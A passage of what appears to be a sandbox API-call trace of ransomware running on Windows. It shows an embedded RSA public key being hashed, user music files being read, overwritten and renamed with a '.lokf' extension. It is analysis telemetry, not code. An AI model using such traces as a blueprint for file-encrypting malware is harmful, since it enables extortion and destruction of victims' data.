KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.833] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.834] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.834] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.834] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.834] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.834] GetLastError () returned 0x0 [0059.834] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.834] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.834] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.834] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.834] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.834] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.834] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.834] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.835] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc8d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.835] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.835] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.835] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.835] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.835] CloseHandle (hObject=0x5cc) returned 1 [0059.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.836] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\2RGMtQTERV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\2rgmtqterv.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\2RGMtQTERV.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\2rgmtqterv.mp3.lokf")) returned 1 [0059.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.837] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.837] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0059.837] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddd40d10, ftCreationTime.dwHighDateTime=0x1d4cd4b, ftLastAccessTime.dwLowDateTime=0xf8f6ed60, ftLastAccessTime.dwHighDateTime=0x1d4c9db, ftLastWriteTime.dwLowDateTime=0xf8f6ed60, ftLastWriteTime.dwHighDateTime=0x1d4c9db, nFileSizeHigh=0x0, nFileSizeLow=0x139ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JzgoC0SQ.m4a", cAlternateFileName="")) returned 1 [0059.837] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.838] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0059.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.838] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\JzgoC0SQ.m4a") returned=".m4a" [0059.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\JzgoC0SQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\jzgoc0sq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.838] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=80365) returned 1 [0059.838] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.840] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x139c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.840] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.841] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.841] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x139ed, lpOverlapped=0x0) returned 1 [0059.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.842] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.842] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.842] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.842] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.842] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.842] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.842] GetLastError () returned 0x0 [0059.842] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.842] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.842] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.842] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.843] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x139f0) returned 0x9c88ae8 [0059.843] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88568 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85938 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c885b0 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85950 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85980 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85998 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.843] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85980 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85998 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85998 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85980 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85998 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85980 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.844] GetCurrentThreadId () returned 0x9e0 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84b68 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.845] GetCurrentThreadId () returned 0x9e0 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85980 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85998 [0059.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85968 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c859b0 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85980 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85980 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85980 | out: hHeap=0x660000) returned 1 [0059.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 